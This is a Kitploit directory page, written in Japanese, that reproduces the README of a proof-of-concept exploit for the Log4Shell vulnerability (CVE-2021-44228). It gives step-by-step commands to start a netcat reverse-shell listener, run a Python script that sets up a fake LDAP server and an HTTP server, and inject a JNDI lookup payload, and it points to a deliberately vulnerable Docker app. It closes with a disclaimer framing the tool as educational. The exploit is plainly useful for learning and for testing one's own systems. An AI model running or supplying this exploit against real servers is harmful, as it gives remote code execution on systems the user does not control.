Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-shell-poc — CVE-2021-44228脆弱性の概念実証 | Kitploit
ツール/GitHubGitHub/kozmer/log4j-shell-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育Archived
GitHubkozmer/log4j-shell-poc

log4j-shell-poc

CVE-2021-44228脆弱性の概念実証

リポジトリを見る
1.9k5412年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j-shell-poc

最近発見されたCVE-2021-44228脆弱性の概念実証(PoC)です。

最近、log4j(Javaのログライブラリ)に新たな脆弱性が発見されました。log4jはElasticsearch、Minecraftなど非常に多くのアプリケーションで広く使用されています。

このリポジトリには、脆弱なサンプルアプリケーションとその概念実証(PoC)エクスプロイトが含まれています。

概念実証(PoC)

PoCとして、プロセスを自動化するPythonファイルがあります。

必要条件:

root@kitploit:~
pip install -r requirements.txt

使用方法:

  • リバースシェル接続を受け付けるためにnetcatリスナーを起動します。
root@kitploit:~
nc -lvnp 9001
  • エクスプロイトを実行します。
    注意: これを機能させるには、展開したJavaアーカイブの名前が jdk1.8.0_20 であり、同じディレクトリにある必要があります。
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

このスクリプトはHTTPサーバーとLDAPサーバーをセットアップし、脆弱なパラメータに貼り付けるためのペイロードも作成します。その後、すべてがうまくいけば、指定したlportでシェルを取得できるはずです。


脆弱なアプリケーション

脆弱なWebアプリケーションを含むDockerfileがあります。以下の手順で使用できます:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

実行後、localhost:8080でアクセスできます。


Javaバージョンの入手

Oracleは過去のすべてのJavaバージョンのアーカイブを提供しています:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
8u20までスクロールし、お使いのOSとハードウェアに合ったファイルをダウンロードしてください。 Screenshot from 2021-12-11 00-09-25

注意: パッケージをダウンロードするにはアカウントを作成する必要があります。

アーカイブをダウンロードして展開すると、jdk1.8.0_20/bin に java と関連するバイナリが含まれています。
注意: 動作させるには、jdkフォルダをこのリポジトリ内に同じ名前で展開してください。

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

免責事項

このリポジトリはCVE-2021-44228に対するワンクリックエクスプロイトを意図していません。このプロジェクトの目的は、この脆弱性について学んだり、自身のアプリケーションをテストしたりするのを支援することです(ただし、この目的にはより適したアプリケーションもあります。例:https://log4shell.tools/)。

ツールをダウンロード